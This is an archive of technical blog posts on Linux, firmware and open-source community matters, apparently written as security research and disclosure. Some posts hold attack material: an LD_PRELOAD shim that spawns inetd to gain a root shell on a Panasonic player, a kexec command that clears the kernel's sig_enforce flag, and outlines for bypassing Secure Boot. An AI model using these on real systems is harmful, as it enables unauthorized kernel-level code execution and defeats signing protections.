2014-04-20 19:39

Home entertainment implementations are pretty appalling

I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable start.

Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.

Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Running strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.

/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.

But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so
so it was just a matter of building a library that hooked open() and launched inetd, dropping it into the right place and then opening the browser.
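
For illustration, a minimal sketch of that kind of shim looks something like this - the library name and the inetd path come from the description above, and the rest is an assumption about what a working version would look like rather than the exact code I used:

/* hook.c - LD_PRELOAD shim that hooks open() and spawns a listener the
 * first time it's called. Build with:
 *   gcc -shared -fPIC -o libSegFault.so hook.c -ldl
 * then drop it into /mnt/sda1/bbb/ on the USB stick. A real target may
 * call open64() instead, which would need the same treatment.
 */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <fcntl.h>
#include <stdarg.h>
#include <unistd.h>

static int (*real_open)(const char *, int, ...);
static int triggered;

int open(const char *path, int flags, ...)
{
    va_list ap;
    mode_t mode = 0;

    if (!real_open)
        real_open = (int (*)(const char *, int, ...))dlsym(RTLD_NEXT, "open");

    if (!triggered) {
        triggered = 1;
        if (fork() == 0) {
            /* Hypothetical payload - inetd, telnetd, whatever's on the box */
            execl("/usr/sbin/inetd", "inetd", (char *)NULL);
            _exit(1);
        }
    }

    if (flags & O_CREAT) {
        va_start(ap, flags);
        mode = va_arg(ap, mode_t);
        va_end(ap);
    }
    return real_open(path, flags, mode);
}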

This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.

The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
2014-04-13 21:43

Real-world Secure Boot attacks

MITRE gave a presentation on UEFI Secure Boot at SyScan earlier this month. You should read the presentation and paper, because it's really very good.

It describes a couple of attacks. The first is that some platforms store their Secure Boot policy in a run time UEFI variable. UEFI variables are split into two broad categories - boot time and run time. Boot time variables can only be accessed while in boot services - the moment the bootloader or kernel calls ExitBootServices(), they're inaccessible. Some vendors chose to leave the variable containing firmware settings available during run time, presumably because it makes it easier to implement tools for modifying firmware settings at the OS level. Unfortunately, some vendors left bits of Secure Boot policy in this space. The naive approach would be to simply disable Secure Boot entirely, but that means that the OS would be able to detect that the system wasn't in a secure state[1]. A more subtle approach is to modify the policy, such that the firmware chooses not to verify the signatures on files stored on fixed media. Drop in a new bootloader and victory is ensured.

But that's not a beautiful approach. It depends on the firmware vendor having made that mistake. What if you could just rewrite arbitrary variables, even if they're only supposed to be accessible in boot services? Variables are all stored in flash, connected to the chipset's SPI controller. Allowing arbitrary access to that from the OS would make it straightforward to modify the variables, even if they're boot time-only. So, thankfully, the SPI controller has some control mechanisms. The first is that any attempt to enable the write-access bit will cause a System Management Interrupt, at which point the CPU should trap into System Management Mode and (if the write attempt isn't authorised) flip it back. The second is to disable access from the OS entirely - all writes have to take place in System Management Mode.

The MITRE results show that around 0.03% of modern machines enable the second option. That's unfortunate, but the first option should still be sufficient[2]. Except the first option relies on the SMI actually firing. And, conveniently, Intel's chipsets have a bit that allows you to disable all SMI sources[3], along with another bit to disable further writes to the first bit. Except 40% of the machines MITRE tested didn't bother setting that lock bit. So you can just disable SMI generation, remove the write-protect bit on the SPI controller and then write to arbitrary variables, including the SecureBoot enable one.
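
If you're curious about your own hardware, the relevant bits can be read straight out of the LPC bridge's PCI config space. Here's a rough sketch in the spirit of tools like chipsec - the offsets (BIOS_CNTL at 0xDC, GEN_PMCON_1 at 0xA0, both on device 00:1f.0) are assumptions that hold for many ICH/PCH-era Intel chipsets, so check them against your chipset datasheet before believing the output:

/* lockcheck.c - report the flash/SMI lock bits discussed above.
 * Run as root; offsets and bit positions are chipset-specific assumptions.
 */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

static uint8_t read_cfg(FILE *f, long offset)
{
    uint8_t val;

    if (fseek(f, offset, SEEK_SET) || fread(&val, 1, 1, f) != 1) {
        perror("read config space");
        exit(1);
    }
    return val;
}

int main(void)
{
    FILE *f = fopen("/sys/bus/pci/devices/0000:00:1f.0/config", "rb");
    uint8_t bios_cntl, gen_pmcon_1;

    if (!f) {
        perror("open LPC bridge config space");
        return 1;
    }
    bios_cntl = read_cfg(f, 0xdc);   /* assumed BIOS_CNTL offset */
    gen_pmcon_1 = read_cfg(f, 0xa0); /* assumed GEN_PMCON_1 offset */
    fclose(f);

    printf("BIOSWE (flash writable from the OS):  %s\n",
           bios_cntl & 0x01 ? "yes" : "no");
    printf("BLE (SMI on write-enable attempts):   %s\n",
           bios_cntl & 0x02 ? "set" : "NOT SET");
    printf("SMM_BWP (writes only from SMM):       %s\n",
           bios_cntl & 0x20 ? "set" : "NOT SET");
    printf("SMI_LOCK (SMI disable bit locked):    %s\n",
           gen_pmcon_1 & 0x10 ? "set" : "NOT SET");
    return 0;
}

If SMM_BWP is unset and SMI_LOCK is also unset, you're looking at the situation described above.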

This is, uh, obviously a problem. The good news is that this has been communicated to firmware and system vendors and it should be fixed in the future. The bad news is that a significant proportion of existing systems can probably have their Secure Boot implementation circumvented. This is pretty unsurprising - I suggested that the first few generations would be broken back in 2012. Security tends to be an iterative process, and turning a branch of the industry that's historically not had to care about it into one that forms the root of platform trust is difficult. As the MITRE paper says, UEFI Secure Boot will be a genuine improvement in security. It's just going to take us a little while to get to the point where the more obvious flaws have been worked out.

[1] Unless the malware was intelligent enough to hook GetVariable, detect a request for SecureBoot and then give a fake answer, but who would do that?
[2] Impressively, basically everyone enables that.
[3] Great for dealing with bugs caused by YOUR ENTIRE COMPUTER BEING INTERRUPTED BY ARBITRARY VENDOR CODE, except unfortunately it also probably disables chunks of thermal management and stops various other things from working as well.
2014-04-03 15:18

Mozilla and leadership

A post I wrote back in 2012 got linked from a couple of the discussions relating to Brendan Eich being appointed Mozilla CEO. The tldr version is "If members of your community don't trust their leader socially, the leader's technical competence is irrelevant". That seems to have played out here.

In terms of background[1]: in 2008, Brendan donated money to the campaign for Proposition 8, a Californian constitutional amendment that expressly defined marriage as being between one man and one woman[2]. Both before and after that he had donated money to a variety of politicians who shared many political positions, including the definition of marriage as being between one man and one woman[3].

Mozilla is an interesting organisation. It consists of the for-profit Mozilla Corporation, which is wholly owned by the non-profit Mozilla Foundation. The Corporation's bylaws require it to work to further the Foundation's goals, and any profit is reinvested in Mozilla. Mozilla developers are employed by the Corporation rather than the Foundation, and as such the CEO is responsible for ensuring that those developers are able to achieve those goals.

The Mozilla Manifesto discusses individual liberty in the context of use of the internet, not in a wider social context. Brendan's appointment was very much in line with the explicit aims of both the Foundation and the Corporation - whatever his views on marriage equality, nobody has seriously argued about his commitment to improving internet freedom. So, from that perspective, he should have been a fine choice.

But that ignores the effect on the wider community. People don't attach themselves to communities merely because of explicitly stated goals - they do so because they feel that the community is aligned with their overall aims. The Mozilla community is one of the most diverse in free software, at least in part because Mozilla's stated goals and behaviour are fairly inspirational. People who identify themselves with other movements backing individual liberties are likely to identify with Mozilla. So, unsurprisingly, there's a large number of socially progressive individuals (LGBT or otherwise) in the Mozilla community, both inside and outside the Corporation.

A CEO who's donated money to strip rights[4] from a set of humans will not be trusted by many who believe that all humans should have those rights. It's not just limited to individuals directly affected by his actions - if someone's shown that they're willing to strip rights from another minority for political or religious reasons, what's to stop them attempting to do the same to you? Even if you personally feel safe, do you trust someone who's willing to do that to your friends? In a community that's made up of many who are either LGBT or identify themselves as allies, that loss of trust is inevitably going to cause community discomfort.

The first role of a leader should be to manage that. Instead, in the first few days of Brendan's leadership, we heard nothing of substance - at best, an apology for pain being caused rather than an apology for the act that caused the pain. And then there was an interview which demonstrated remarkable tone deafness. He made no attempt to alleviate the concerns of the community. There were repeated non-sequiturs about Indonesia. It sounded like he had no idea at all why the community that he was now leading was unhappy.

And, today, he resigned. It's easy to get into hypotheticals - could he have compromised his principles for the sake of Mozilla? Would an initial discussion of the distinction between the goals of members of the Mozilla community and the goals of Mozilla itself have made this more palatable? If the board had known this would happen, would they have made the same choice - and if they didn't know, why not?

But that's not the real point. The point is that the community didn't trust Brendan, and Brendan chose to leave rather than do further harm to the community. Trustworthy leadership is important. Communities should reflect on whether their leadership reflects not only their beliefs, but the beliefs of those that they would like to join the community. Fail to do so and you'll drive them away instead.

[1] For people who've been living under a rock
[2] Proposition 8 itself was a response to an ongoing court case that, at the point of Proposition 8 being proposed, appeared likely to support the overturning of Proposition 22, an earlier Californian ballot measure that legally (rather than constitutionally) defined marriage as being between one man and one woman. Proposition 22 was overturned, and for a few months before Proposition 8 passed, gay marriage was legal in California.
[3] http://www.theguardian.com/technology/2014/apr/02/controversial-mozilla-ceo-made-donations-right-wing-candidates-brendan-eich
[4] Brendan made a donation on October 25th, 2008. This postdates the overturning of Proposition 22, and as such gay marriage was legal in California at the time of this donation. Donating to Proposition 8 at that point was not about supporting the status quo, it was about changing the constitution to forbid something that courts had found was protected by the state constitution.
2014-03-23 23:39

What free software means to me

I was awarded the Free Software Foundation Award for the Advancement of Free Software this weekend[1]. I'd been given some forewarning, and I spent a bunch of that time thinking about how free software had influenced my life. It turns out that it's a lot.

I spent most of the 90s growing up in an environment that was rather more interested in cattle than in computers, and had very little internet access during that time. My entire knowledge of the wider free software community came from a couple of CDs that contained a copy of the jargon file, the source code to the entire GNU project and an early copy of the m68k Linux kernel.

But that was enough. Before I'd even got to university, I knew what free software was. I'd had the opportunity to teach myself how an operating system actually worked. I'd seen the benefits of being able to modify software and share those modifications with others. I met other people with the same interests. I ended up with a job writing free software and collaborating with others on integrating it with upstream code. And, from there, I became more and more involved with a wider range of free software communities, finding an increasing number of opportunities to help make changes that benefited both me and others.

Without free software I'd have started years later. I'd have lost the opportunity to collaborate with people spread over the entire world. My first job would have looked very different, as would my entire career since then. Without free software, almost everything I've achieved in my adult life would have been impossible.

To me, free software means I've lived a significantly better life than would otherwise have been the case. But more than that, it means doing what I can to make sure that other people have the same opportunities. I am here because of the work of others. The most rewarding part of my continued involvement is the knowledge that I am part of a countless number of people working to make sure that others can tell the same story in future.

[1] I'd link to the actual press release, but it contains possibly the worst photograph of me in the entire history of the universe
2014-03-12 15:37

Dealing with Apple ACPI issues

I wrote about Thunderbolt on Apple hardware a while ago. Since then Andreas Noever has somehow managed to write a working Thunderbolt stack, which is awesome! But there was still the problem I mentioned of the device not appearing unless you passed acpi_osi="Darwin" on the kernel command line, and a further problem that if you suspended and then resumed, it vanished again.

The ACPI _OSI interface is a mechanism for the firmware to determine the OS that the system is running. It turns out that this works fine for operating systems that export fairly static interfaces (Windows, which adds a new _OSI per release) and poorly for operating systems that don't even guarantee any kind of interface stability in security releases (Linux, which claimed to be "Linux" regardless of version until we turned that off). OS X claims to be Darwin and nothing else. As I mentioned before, claiming to be Darwin in addition to Windows was enough to get the Thunderbolt hardware to stay alive after boot, but it wasn't enough to get it powered up again after suspend.

It turns out that there's two sections of ACPI code where this Mac checks _OSI. The first is something like:

if (_OSI("Darwin")) Store 0x2710 OSYS; else if(_OSI("Windows 2009") Store 0x7D9 OSYS; else…

ie, if the OS claims to be Darwin, all other strings are ignored. This is called from \_SB._INI(), which is the first ACPI method the kernel executes. The check for whether to power down the Thunderbolt controller occurs after this and then works correctly.

The second version is less helpful. It's more like:

if (_OSI("Darwin")) Store 0x2710 OSYS; if (_OSI("Windows 2009")) Store 0x7D9 OSYS; if…

ie, if the OS claims to be both Darwin and Windows 2009 (which Linux will if you pass acpi_osi="Darwin"), the OSYS variable gets set to the Windows 2009 value. This version gets called during PCI initialisation, and once it's run all the other Thunderbolt ACPI calls stop doing anything and the controller gets powered down after suspend/resume. That can be fixed easily enough by special casing Darwin. If the platform requests Darwin before anything else, we'll just stop claiming to be Windows.
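
Conceptually the fix is just "once Darwin has been requested, stop admitting to being Windows". This isn't the actual kernel patch, just a self-contained sketch of the rule:

#include <stdbool.h>
#include <stdio.h>
#include <string.h>

static bool darwin_requested;

/* Interface strings this hypothetical _OSI handler would normally accept */
static const char *supported[] = { "Darwin", "Windows 2009", "Windows 2012" };

static bool osi_supported(const char *interface)
{
    size_t i;

    if (!strcmp(interface, "Darwin"))
        darwin_requested = true;
    else if (darwin_requested && !strncmp(interface, "Windows ", 8))
        return false;   /* Darwin came first: stop claiming to be Windows */

    for (i = 0; i < sizeof(supported) / sizeof(supported[0]); i++)
        if (!strcmp(interface, supported[i]))
            return true;
    return false;
}

int main(void)
{
    /* Mimics the second ASL block above: Darwin is queried, then Windows */
    printf("Darwin: %d\n", osi_supported("Darwin"));
    printf("Windows 2009: %d\n", osi_supported("Windows 2009"));
    return 0;
}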

Phew. Working Thunderbolt! (Well, almost - _OSC fails and so we disable PCIe hotplug, but that's easy to work around). But boo, no working battery. Apple do something very strange with their ACPI battery interface. If you're running anything that doesn't claim to be Darwin, Apple expose an ACPI Control Method battery. Control Method interfaces abstract the complexity away into either ACPI bytecode or system management traps - the OS simply calls an ACPI method, magic happens and it gets an answer back. If you claim to be Darwin, Apple remove that interface and instead expose the raw ACPI Smart Battery System interface. This provides an i2c bus over which the OS must then speak the Smart Battery System protocol, allowing it to directly communicate with the battery.

Linux has support for this, but it seems that this wasn't working so well and hadn't been for years. Loading the driver resulted in modprobe hanging until a timeout occurred, and most accesses to the battery would (a) take forever and (b) probably fail. It also had the nasty habit of breaking suspend and resume, which was unfortunate since getting Thunderbolt working over suspend and resume was the whole point of this exercise.

So. I modified the sbs driver to dump every command it sent over the i2c bus and every response it got. Pretty quickly I found that the failing operation was a write - specifically, a write used to select which battery should be connected to the bus. Interestingly, Apple implemented their Control Method interface by just using ACPI bytecode to speak the SBS protocol. Looking at the code in question showed that they never issued any writes, and the battery worked fine anyway. So why were we writing? SBS provides a command to tell you the current state of the battery subsystem, including which battery (out of a maximum of 4) is currently selected. Unsurprisingly, calling this showed that the battery we wanted to talk to was already selected. We then asked the SBS manager to select it anyway, and the manager promptly fell off the bus and stopped talking to us. In keeping with the maxim of "If hardware complains when we do something, and if we don't really need to do that, don't do that", this makes it work.

Working Thunderbolt and working battery. We're even getting close to getting switchable GPU support working reasonably, which is probably just going to involve rewriting the entirety of fbcon or something similarly amusing.
2014-03-09 23:48

The simple things in life

I've spent a while trying to make GPU switching work more reliably on Apple hardware, and got to the point where my Retina MBP now comes up with X running on Intel regardless of what the firmware wanted to do (test patches here). But in the process I'd introduced an additional GPU switch which added another layer of flicker to the boot process. I spent some time staring at driver code and poking registers trying to figure out how I could let i915 probe EDID from the panel without switching the display over, and made no progress at all.

And then I realised that nouveau already has all the information that i915 wants, and maybe we could just have the Switcheroo code hand that over instead of forcing i915 to probe again. Sigh.
2014-02-23 10:32

The importance of a community-focused mindset

Piston, an OpenStack-in-a-box vendor[1], are a sponsor of the Red Hat[2] Summit this year. Last week they briefly ceased to be one, for no publicly stated reason, although it's been suggested that this was in response to Piston winning a contract that Red Hat was also bidding on. This situation didn't last for long - Red Hat's CTO tweeted that this was an error and that Red Hat would pay Piston's sponsorship fee for them.

To Red Hat's credit, having the CTO immediately and publicly accept responsibility and offer reparations seems like the best thing they could possibly do in the situation and demonstrates that there are members of senior management who clearly understand the importance of community collaboration to Red Hat's success. But that leaves open the question of how this happened in the first place.

Red Hat is big on collaboration. Workers get copies of the Red Hat Brand Book, an amazingly well-written description of how Red Hat depends on the wider community. New hire induction sessions stress the importance of open source and collaboration. Red Hat staff are at the heart of many vital free software projects. As far as fundamentally Getting It is concerned, Red Hat are a standard to aspire to.

Which is why something like this is somewhat unexpected. Someone in Red Hat made a deliberate choice to exclude Piston from the Summit. If the suggestion that this was because of commercial concerns is true, it's antithetical to the Red Hat Way. Piston are a contributor to upstream OpenStack, just as Red Hat are. If Piston can do a better job of selling that code than Red Hat can, the lesson that Red Hat should take away is that they need to do a better job - not punish someone else for doing so.

However, it's not entirely without precedent. The most obvious example is the change to kernel packaging that happened during the RHEL 6 development cycle. Previous releases had included each individual modification that Red Hat made to the kernel as a separate patch. From RHEL 6 onward, all these patches are merged into one giant patch. This was intended to make it harder for vendors like Oracle to compete with RHEL by taking patches from upcoming RHEL point releases, backporting them to older ones and then selling that to Red Hat customers. It obviously also had the effect of hurting other distributions such as Debian who were shipping 2.6.32-based kernels - bugs that were fixed in RHEL had to be separately fixed in Debian, despite Red Hat continuing to benefit from the work Debian put into the stable 2.6.32 point releases.

It's almost three years since that argument erupted, and by and large the community seems to have accepted that the harm Oracle were doing to Red Hat (while giving almost nothing back in return) justified the change. The parallel argument in the Piston case might be that there's no reason for Red Hat to give advertising space to a company that's doing a better job of selling Red Hat's code than Red Hat are. But the two cases aren't really equal - Oracle are a massively larger vendor who take significantly more from the Linux community than they contribute back. Piston aren't.

Which brings us back to how this could have happened in the first place. The Red Hat company culture is supposed to prevent people from thinking that this kind of thing is acceptable, but in this case someone obviously did. Years of Red Hat already having strong standing in a range of open source communities may have engendered some degree of complacency and allowed some within the company to lose track of how important Red Hat's community interactions are in perpetuating that standing. This specific case may have been resolved without any further fallout, but it should really trigger an examination of whether the reality of the company culture still matches the theory. The alternative is that this kind of event becomes the norm rather than the exception, and it takes far less time to lose community goodwill than it takes to build it in the first place.

[1] And, in the spirit of full disclosure, a competitor to my current employer
[2] Furthering the spirit of full disclosure, a former employer
2014-02-10 11:14

IBM's remote firmware configuration protocol

I spent last week looking into the firmware configuration protocol used on current IBM system X servers. IBM provide a tool called ASU for configuring firmware settings, either in-band (ie, running on the machine you want to reconfigure) or out of band (ie, running on a remote computer and communicating with the baseboard management controller - IMM in IBM-speak). I'm not a fan of using vendor binaries for this kind of thing. They tend to be large (ASU is a 20MB executable) and difficult to script, so I'm gradually reimplementing them in Python. Doing that was fairly straightforward for Dell and Cisco, both of whom document their configuration protocol. IBM, on the other hand, don't. My first plan was to just look at the wire protocol, but it turns out that it's using IPMI 2.0 to communicate and that means that the traffic is encrypted. So, obviously, time to spend a while in gdb.

The most important lesson I learned last time I did this was "Check whether the vendor tool has a debug option". ASU didn't mention one in its help text and there was no sign of a getopt string, so this took a little longer - but nm helpfully showed a function called DebugLog and setting a breakpoint on that in gdb showed it being called a bunch of times, so woo. Stepping through the function revealed that it was checking the value of a variable, and looking for other references to that variable in objdump revealed a -l argument. Setting that to 255 gave me rather a lot of output. Nearby was a reference to --showsptraffic, and passing that as well gave me output like:

BMC Sent: 2e 90 4d 4f 00 06 63 6f 6e 66 69 67 2e 65 66 69
BMC Recv: 00 4d 4f 00 21 9e 00 00

which was extremely promising. 2e is IPMI-speak for an OEM specific command, which seemed pretty plausible. 4d 4f 00 is 20301 in decimal, which is the IANA enterprise number for IBM's system X division (this is required by the IPMI spec, it wasn't an inspired piece of deduction on my part). 63 6f 6e 66 69 67 2e 65 66 69 is ASCII for config.efi. That left 90 and 06 to figure out. 90 appeared in all of the traces, so it appears to be the command to indicate that the remaining data is destined for the IMM. The prior debug output indicated that we were in the QuerySize function, so 06 presumably means… query the size. And this is supported by the response - 00 (a status code), 4d 4f 00 (the IANA enterprise number again, to indicate that the responding device is speaking the same protocol as you) and 21 9e 00 00 - or, in rational endianness, 40481, an entirely plausible size.

Once I'd got that far the rest started falling into place fairly quickly. 01 rather than 06 indicated a file open request, returning a four byte file handle of some description. 02 was read, 03 was write and 05 was close. Hacking this together with pyghmi meant I could open a file and read it. Success!
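
The framing is simple enough that it's easy to reconstruct by hand. This sketch just rebuilds the QuerySize request from the trace above - all the constants come from that trace rather than from any IBM documentation, and you'd hand the resulting bytes to whatever IPMI transport you prefer (pyghmi, ipmitool raw, ...):

#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define IMM_NETFN        0x2e   /* OEM/group network function */
#define IMM_FILE_CMD     0x90   /* "the rest of this is for the IMM" */
#define SUBCMD_QUERYSIZE 0x06   /* 01 open, 02 read, 03 write, 05 close */

static size_t build_imm_request(uint8_t *buf, uint8_t subcmd,
                                const void *payload, size_t len)
{
    size_t off = 0;

    buf[off++] = 0x4d;          /* IANA enterprise number 20301, */
    buf[off++] = 0x4f;          /* little-endian                 */
    buf[off++] = 0x00;
    buf[off++] = subcmd;
    memcpy(buf + off, payload, len);
    return off + len;
}

int main(void)
{
    uint8_t buf[64];
    const char *name = "config.efi";
    size_t len = build_imm_request(buf, SUBCMD_QUERYSIZE, name, strlen(name));

    printf("NetFn 0x%02x cmd 0x%02x data:", IMM_NETFN, IMM_FILE_CMD);
    for (size_t i = 0; i < len; i++)
        printf(" %02x", buf[i]);
    printf("\n");
    return 0;
}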

Well, kind of. I was getting back a large blob of binary. The debug trace showed calls to an EfiDecompress function, so on a whim I tried just decompressing it using the standard UEFI compression format. Shockingly, it worked and now I had a 345K XML blob and presumably many more problems than I'd previously had. Parsing the XML was fairly straightforward, and now I could retrieve the full set of config options, along with the default, current and possible values for them.

Making changes was pretty much just the reverse of this. A small XML blob containing the new values is compressed and written to asu_update.efi. One of the elements is a random identifier, which will then appear in another file called config_log along with a status. Just keep re-reading this until the value changes to CM_DONE and we're good.

The in-band configuration appears to be identical, but rather than sending commands over the wire they're sent through the system's IPMI controller directly. Yes, this does mean that it's sending compressed XML through a single io port. Yes, I'd rather be drinking.

I've documented the protocol here and hope to be able to release this code before too long - right now I'm trying to nail down the interface a little, but it's broadly working.
2014-01-20 10:45

Not all CLAs are equal

Contributor License Agreements ("CLAs") are a mechanism for an upstream software developer to insist that contributors grant the upstream developer some additional set of rights. These range in extent - some CLAs require that the contributor reassign their copyright over the contribution to the upstream developer, some merely provide the upstream developer with a grant of rights that aren't explicit in the software license (such as an explicit patent grant for a contribution licensed under a BSD-style license).

CLAs aren't new. FSF-copyrighted projects have been using copyright assignment since at least 1985 - in return, the FSF promise that the software will always be distributed under a copyleft-style license. For over a decade, Apache Software Foundation projects have required that contributors sign a CLA that allows them to retain copyright, but grants the ASF the right to relicense the work as it wishes. For the most part, this hasn't been terribly controversial.

So why do people object so much when Canonical do it? I've written about this in the context of Mir before, but it's worth expanding on the general case. The FSF's copyright assignment ensures that contributions to GPLed software will only be distributed under GPL-style licenses. The Apache CLA permits the ASF to relicense a contribution under a proprietary license, but the Apache license allows anyone to do that anyway. Going through Wikipedia's list of CLA users, the majority cover projects that are under BSD- or Apache-style licenses, with a couple of cases covering GPLed projects with a promise that any contributions will only be distributed under GPL-like licenses[1]. Either everyone can produce proprietary derivative works, or nobody can.

In contrast, Canonical ship software under the GPLv3 family of licenses (GPL, AGPL and LGPL) but require that contributors sign an agreement that permits Canonical to relicense their contributions under a proprietary license. This is a fundamentally different situation to almost all widely accepted CLAs, and it's disingenuous for Canonical to defend their CLA by pointing out the broad community uptake of, for instance, the Apache CLA.

Canonical could easily replace their CLA with one that removed this asymmetry - Project Harmony, the basis of Canonical's CLA, permits you to specify an "inbound equals outbound" agreement that prevents upstream from relicensing under a proprietary license[2]. Canonical's deliberate choice not to do so just strengthens the argument that the CLA is primarily about wanting to produce proprietary versions of software rather than wanting to strengthen their case in any copyright or patent disputes. It's unsurprising that people feel disinclined to contribute to projects under those circumstances, and it's difficult to understand why Canonical simultaneously insist on this hostile behaviour and bemoan the lack of community contribution to Canonical projects.

[1] The one major exception is the Digia/Qt project CLA, which covers an LGPLed work but makes it entirely clear that Digia will ship your contributions under proprietary licenses as well. At least they're honest.

[2] See the various options in section 2.1(d) here. Canonical chose option five. If they'd chosen option one instead, this wouldn't be a problem.
2013-12-03 15:06

Subverting security with kexec

(Discussion of a presentation I gave at Kiwicon last month)

Kexec is a Linux kernel feature intended to allow the booting of a replacement kernel at runtime. There's a few reasons you might want to do that, such as using Linux as a bootloader[1], rebooting without having to wait for the firmware to reinitialise or booting into a minimal kernel and userspace that can be booted on crash in order to save system state for later analysis.

But kexec's significantly more flexible than this. The kexec system call interface takes a list of segments (ie, pointers to a userspace buffer and the desired target destination) and an entry point. The kernel relocates those segments and jumps to the entry point. That entry point is typically code referred to as purgatory, due to the fact that it lives between the world of the first kernel and the world of the second kernel. The purgatory code sets up the environment for the second kernel and then jumps to it. The first kernel doesn't need to know anything about what the second kernel is or does. While it's conventional to load Linux, you can load just about anything.
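
For reference, the interface looks roughly like this - a do-nothing example that loads a single stub segment via the raw system call, on the assumption that you never actually execute it (kexec -e at this point would jump your machine into a page of zeroes):

#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/kexec.h>

int main(void)
{
    static char payload[4096];          /* stand-in for real code */
    struct kexec_segment seg = {
        .buf   = payload,               /* userspace source buffer */
        .bufsz = sizeof(payload),
        .mem   = (void *)0x100000,      /* requested physical destination */
        .memsz = sizeof(payload),
    };

    /* entry = where the kernel jumps once the segments are in place */
    long ret = syscall(SYS_kexec_load, 0x100000UL, 1UL, &seg,
                       (unsigned long)KEXEC_ARCH_DEFAULT);
    if (ret)
        perror("kexec_load");
    else
        printf("stub loaded; kexec -e would now jump to it\n");
    return 0;
}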

The most important thing to note here is that none of this is signed. In other words, despite us having a robust in-kernel mechanism for ensuring that only signed modules can be inserted into the kernel, root can still load arbitrary code via kexec and execute it. This seems like a somewhat irritating way to patch the running kernel, so thankfully there's a much more straightforward approach.

I modified kexec to add an additional loader and uploaded the code here. Build and install it. Make sure that /sys/module/module/parameters/sig_enforce on your system is "Y". Then, as root, do something like:
kexec --type="dummy" --address=`printf "0x%x" $(( $(grep "B sig_enforce" /proc/kallsyms | awk '{print "0x"$1}') & 0x7fffffff))` --value=0 --load-preserve-context --mem-max=0x10000 /bin/true
to load it[2]. Now do kexec -e and watch colours flash and check /sys/module/module/parameters/sig_enforce again.

The beauty of this approach is that it doesn't rely on any kernel bugs - it's using kernel functionality that was explicitly designed to let you do this kind of thing (ie, run arbitrary code in ring 0). There's not really any way to fix it beyond adding a new system call that has rather tighter restrictions on the binaries that can be loaded. If you're using signed modules but still permit kexec, you're not really adding any additional security.

But that's not the most interesting way to use kexec. If you can load arbitrary code into the kernel, you can load anything. Including, say, the Windows kernel. ReactOS provides a bootloader that's able to boot the Windows 2003 kernel, and it shouldn't be too difficult for a sufficiently enterprising individual to work out how to get Windows 8 booting. Things are a little trickier on UEFI - you need to tell the firmware which virtual→physical map to use, and you can only do it once. If Linux has already done that, it's going to be difficult to set up a different map for Windows. Thankfully, there's an easy workaround. Just boot with the "noefi" kernel argument and the kernel will skip UEFI setup, letting you set up your own map.

Why would you want to do this? The most obvious reason is avoiding Secure Boot restrictions. Secure Boot, if enabled, is explicitly designed to stop you booting modified kernels unless you've added your own keys. But if you boot a signed Linux distribution with kexec enabled (like, say, Ubuntu) then you're able to boot a modified Windows kernel that will still believe it was booted securely. That means you can disable stuff like the Early Launch Anti-Malware feature or driver signing, or just stick whatever code you want directly into the kernel. In most cases all you'd need for this would be a bootloader, kernel and an initrd containing support for the main storage, an ntfs driver and a copy of kexec-tools. That should be well under 10MB, so it'll easily fit on the EFI system partition. Copy it over the Windows bootloader and you should be able to boot a modified Windows kernel without any terribly obvious graphical glitches in the process.

And that's the story of why kexec is disabled on Fedora when Secure Boot is enabled.

[1] That way you only have to write most drivers once
[2] The address section finds the address of the sig_enforce symbol in the kernel, and the value argument tells the dummy code what value to set that address to. --load-preserve-context informs the kernel that it should save hardware state in order to permit returning to the original kernel. --mem-max indicates the highest address that the kernel needs to back up. /bin/true is just there to satisfy the argument parser.
2013-10-16 13:48

Standing for the Linux Foundation Technical Advisory Board

According to its charter, the Linux Foundation Technical Advisory Board exists "to advise The Linux Foundation Board of Directors (Board) and the management of The Linux Foundation (Management) on matters related to supporting the technical agenda of The Linux Foundation". It consists of 10 members, with 5 seats up for election each year. Elections take place at an event at Kernel Summit, but are also open to attendees of whichever conference is colocated with the Kernel Summit that year. The election announcement is emailed to the Linux kernel list and tech-board-discuss, a mostly moribund list that springs into life once a year for election announcements.

This arrangement seemed odd to me even back in 2007. Back then the Linux Foundation was already sponsoring development of certain non-kernel components, and now that list is even larger. While nominally open to all, nominations for the TAB tend to go to people actively involved in the kernel community. That's probably better than drawing from any other single technical community (kernel developers tend to end up dealing with bugs from a fairly wide range of projects, so they're not entirely unaware of what other people have to deal with), but it still seems suboptimal. The current membership is mostly limited to people who spend little to no time working with userspace developers, let alone anyone active in other Linux Foundation projects. I don't think this is a good thing.

